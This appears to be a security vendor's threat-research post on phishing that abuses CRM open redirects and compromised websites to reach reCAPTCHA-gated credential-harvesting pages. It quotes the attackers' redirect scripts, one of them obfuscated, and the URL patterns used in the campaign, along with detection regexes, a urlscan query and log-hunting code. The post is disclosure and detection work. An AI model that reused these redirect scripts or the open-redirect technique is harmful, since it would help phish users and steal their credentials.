A deeper dive of the nefarious use of open redirects in conjunction with reCAPTCHA

Gone phishing? Beware of what you (re)CAPTCHA

It’s no surprise that phishing continues to be the main access vector when targeting everything from small to large businesses. Our team has continued the research that Microsoft has published in order to further highlight some of the behavior we’ve been observing in our customer environments. The purpose of this work is to share the results of what IronNet has seen, and to allow others to build off this research. We’ve divided our research into three groups:

Table of Contents

1. Customer Relationship Management (CRM) platforms allowing open redirects

2. Compromised websites redirecting to reCAPTCHA

3. Random reCAPTCHAs

IronNet research

1. CRMs allow open redirects

We began our research by using the regex provided in the Microsoft blog post to hunt retroactively for the DGA-like domains. We confirmed that some CRMs belonging to household-name companies were allowing open redirection to the malicious phishing pages. Based on our retroactive hunts, the actors seemed to be targeting one specific CRM platform, judging by the URL structure of these requests.

https://t.msg.<domain>/r/id=<messageid>,<deliveryID>,<trackingURL>&p1=<malicious url>

The use of these CRMs seems to have started within the first quarter of 2021, and some are no longer active. Although we did find a handful of examples extending into the second quarter of 2021, we believe the discrepancy depends on when each customer discovered the abuse and fixed their settings. When searching for current abuse (the past two months), we also discovered other CRMs allowing open redirection. For the companies where we observed this behavior still ongoing, we reached out and asked them to stop allowing it.

2. Websites redirecting to phishing reCAPTCHA

Compromised websites

While confirming the abuse of CRMs, we also discovered compromised websites being used to redirect users to phishing reCAPTCHA landing pages. With the compromised websites, we noticed two main patterns in the URL schema, as well as in the JavaScript hosted on the compromised websites.

1st pattern:

<random subdomain>.<compromised domain>/<base64 of user being phished>

The JavaScript code below typically accompanies compromised websites that use the first pattern.

<script type="text/javascript">
// Read the URL fragment (everything after '#') of the current page
let url = window.location.hash;
// Drop the leading '#' to leave only the base64 payload
let url1 = window.location.hash.substring(1);
console.log();
// Base64-decode the payload and send the browser to the resulting URL
window.location=window.atob(url1)
</script>

2nd pattern:

<name>.<compromised domain>/?#<base64 encoded domain + user email>

The base64-encoded portion after the # decodes to:

https://example.co.ug?e=username@example.com

Compromised websites with the second pattern typically host the following JavaScript. It works on any subdomain: it takes the portion of the URL after the #, base64-decodes it, and then redirects the user to the phishing page, passing along their email address.

<script type="text/javascript">
var _0xdad1=['_self','location','hash'];(function(_0x9989e4,_0xdad1ad){var _0x21d0aa=function(_0x1664ef){while(--_0x1664ef){_0x9989e4['push'](_0x9989e4['shift']());}};_0x21d0aa(++_0xdad1ad);}(_0xdad1,0x19c));
var _0x21d0=function(_0x9989e4,_0xdad1ad){_0x9989e4=_0x9989e4-0x0;var _0x21d0aa=_0xdad1[_0x9989e4];
return _0x21d0aa;};
var _0x5c3ff0=_0x21d0,hash=window[_0x5c3ff0('0x0')][_0x5c3ff0('0x1')],gethash=hash['split']('#')[0x1],decodedhash=atob(gethash),URL=decodedhash;
window['open'](URL,_0x5c3ff0('0x2'));
</script>
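As an added example (not part of the original post or of the kits' own code), the following Python triages observed URLs in the three shapes described above: the CRM open-redirect URL with its p1= value, the base64 path of the first pattern, and the base64 fragment of the second. The sample URLs are constructed with placeholder .example hosts, and the pattern names and field names are this example's own.

```python
import base64
import binascii
from urllib.parse import parse_qs, unquote, urlparse

def decode_payload(blob):
    """atob()-style decode of a path/fragment blob; None when it is not base64 text."""
    blob = unquote(blob).strip()
    blob += "=" * (-len(blob) % 4)  # tolerate missing base64 padding, as atob() does
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def email_from(target):
    """Landing URLs carry the victim as ?e=<address>; None when absent."""
    return parse_qs(urlparse(target).query).get("e", [None])[0]

def triage_url(url):
    """Classify an observed URL as one of the three redirect shapes described in the post."""
    p = urlparse(url)
    # CRM open redirect: the p1= value sits inside the /r/ path, not in a query string,
    # so a normal query-string parser never sees it.
    if p.path.startswith("/r/"):
        for part in (p.path + "&" + p.query).split("&"):
            if part.startswith("p1="):
                target = unquote(part[3:])
                return {"pattern": "crm_open_redirect", "target": target,
                        "email": email_from(target)}
    # Compromised site: base64 in the #fragment (2nd pattern; what both scripts read)
    # or as the whole path (the 1st pattern's URL shape).
    blob = p.fragment or p.path.lstrip("/")
    decoded = decode_payload(blob) if blob else None
    if decoded is None:
        return None
    if decoded.startswith(("http://", "https://")):
        return {"pattern": "compromised_site_fragment", "target": decoded,
                "email": email_from(decoded)}
    if "@" in decoded:
        return {"pattern": "compromised_site_path", "target": None, "email": decoded}
    return None

# Constructed sample URLs in the three shapes (placeholder hosts, not real indicators).
SAMPLES = {
    "crm": "https://t.msg.crm.example/r/id=1,2,https://crm.example/t&p1=https://phish.example/main/",
    "pattern1": "https://xk3j.compromised.example/"
                + base64.b64encode(b"victim@example.com").decode(),
    "pattern2": "https://login.compromised.example/?#"
                + base64.b64encode(b"https://example.co.ug?e=username@example.com").decode(),
}
```

Run over proxy or mail-gateway URL logs, the email field tells you which users were targeted and the target field which landing page to hunt for next.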

Examples of the landing pages:

As you can see, the pattern from the original Microsoft article has evolved and now includes new patterns. We believe this to be the result of multiple threat actors changing up their pattern in order to avoid simple detections that look for the original pattern, just like we did.

3. Other reCAPTCHAs

Finally, we discovered pages that didn't match any known pattern but host the same phishing kit. Users are met with the reCAPTCHA page and then forwarded on to the corresponding phishing site to enter their credentials. Using http://urlscan.io, we were not able to determine how a user might have arrived at these pages.

What’s new about this research and why should we care?

As the Microsoft blog post pointed out, what’s new about this campaign is the use of open redirects in conjunction with reCAPTCHA. Not only are threat actors abusing domains with good reputation, they are actively attempting to thwart analysis of the redirect chain.

This type of campaign can be alarming for companies that invest in cyber training, especially training that recommends employees hover over a link to see where it goes before they click. In this instance, employees are likely to trust these domains because they are owned by legitimate companies. It has also been widely discussed that most users, when presented with a reCAPTCHA, believe a website to be more legitimate. This is not the first time this technique has been employed by phishing actors, and it is not the first time it has been effective.

We know adversaries, especially ransomware gangs, use phishing and credential harvesting as initial attack vectors for compromising businesses. Through this research, we discovered the targeting of very large companies that, if successfully phished, would absolutely make for great targets of a ransomware campaign. We have provided some detection methods below for two reasons:

1. We want to give companies the ability to detect if any of their users were phished by doing retroactive hunts over the CRMs that were allowing redirection and the domains of the landing pages.

2. We want companies to know if their CRM or website is being abused to allow redirection that it should not allow.

Detection

We’ve built out some https://urlscan.io queries, as well as regexes, so that others can see the results we’ve found. To pull more than 100 results, you will need a https://urlscan.io pro account.

REGEXs

We have produced the following regex, which finds the relevant final-destination (FD) phishing domains with high accuracy. We have also included the urlscan query syntax.

REGEX:

All phishing URLs abusing reCAPTCHA

^(http)(s)?:\/\/([a-z0-9]+\.)?([a-z0-9\-])+\.[a-z]+\/(main|jump)\/$

urlscan.io Query

filename:"/recaptcha/api.js" AND page.url.keyword:/(http)(s)?:\/\/([a-z0-9]+\.)?([a-z0-9\-])+\.[a-z]+\/(main|jump)\//
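As an added example of running this detection over proxy logs (it is not from the original post or the IronNet notebook), the Python below applies the regex above unchanged and, like the urlscan query, only flags a client when the matching page load is followed by a request for /recaptcha/api.js. The log format, the 30-second window and the .example hosts are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# The final-destination regex from the post, unchanged, as a Python raw string.
FD_PATTERN = re.compile(r"^(http)(s)?:\/\/([a-z0-9]+\.)?([a-z0-9\-])+\.[a-z]+\/(main|jump)\/$")
RECAPTCHA_API = "/recaptcha/api.js"  # the script the urlscan query keys on

def matches_fd(url):
    """True when url matches the post's regex. Lower-casing first is this example's
    choice: the regex has only lowercase classes and hostnames are case-insensitive."""
    return FD_PATTERN.match(url.lower()) is not None

def parse_log_line(line):
    """Parse the constructed log format used below: '<ISO-8601 time> <client> <url>'."""
    ts, client, url = line.split(maxsplit=2)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), client, url.strip()

def hunt(lines, window=timedelta(seconds=30)):
    """Mirror the urlscan query over proxy logs: flag a client that requested a URL
    matching the final-destination pattern and then loaded /recaptcha/api.js within
    `window`. Returns a list of (client, landing_url) pairs."""
    events = sorted(parse_log_line(ln) for ln in lines if ln.strip())
    hits = []
    for i, (ts, client, url) in enumerate(events):
        if not matches_fd(url):
            continue
        for later_ts, later_client, later_url in events[i + 1:]:
            if later_ts - ts > window:
                break  # events are time-ordered; nothing later can be in the window
            if later_client == client and RECAPTCHA_API in later_url:
                hits.append((client, url))
                break
    return hits

# Constructed proxy log (placeholder hosts under .example; not real indicators).
# 10.0.0.5 follows the full chain; 10.0.0.9 loads api.js well outside the window.
SAMPLE_LOG = """\
2021-06-01T12:00:00Z 10.0.0.5 https://t.msg.crm.example/r/id=1,2,https://crm.example/t&p1=https://k9sd-hh.example/main/
2021-06-01T12:00:01Z 10.0.0.5 https://k9sd-hh.example/main/
2021-06-01T12:00:02Z 10.0.0.5 https://www.google.com/recaptcha/api.js?render=explicit
2021-06-01T12:00:03Z 10.0.0.7 https://www.example.com/main/index.html
2021-06-01T12:00:04Z 10.0.0.9 https://login.rtqx1.example/jump/
2021-06-01T12:05:00Z 10.0.0.9 https://www.google.com/recaptcha/api.js
"""
```

The regex alone matches the /jump/ hit from 10.0.0.9 too; requiring the reCAPTCHA script load within the window is what separates a visited landing page from a bare pattern match.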
Jupyter Notebook:

New domains continue to pop up daily, so we have provided a Jupyter Notebook for researchers to pull down and extract results from urlscan using our methodology.

Link: urlscan notebook

Call to action

When registering a reCAPTCHA for a website, the administrator must tie the website or websites they wish to secure to a Google account. This is good news for defenders because this means that once a malicious phishing domain that uses reCAPTCHA has been discovered, Google should be able to identify the Google account that is tied to that website and deactivate the account, effectively shutting down all other phishing domains that leverage this service. To be clear, the phishing domains and servers will still technically be operational, but once Google deactivates the associated account and until the malicious actor removes the reCAPTCHA integration, the site will be unreachable. With the already detected domains and reCAPTCHA site keys we have provided at the below GitHub link and the detection techniques we have outlined above, Google could potentially put an end to this campaign entirely.

Indicators of Compromise:

Link: GitHub


About IronNet
IronNet is dedicated to delivering the power of collective cybersecurity to defend companies, sectors, and nations. By uniting advanced technology with a team of experienced professionals, IronNet is committed to providing peace of mind in the digital world.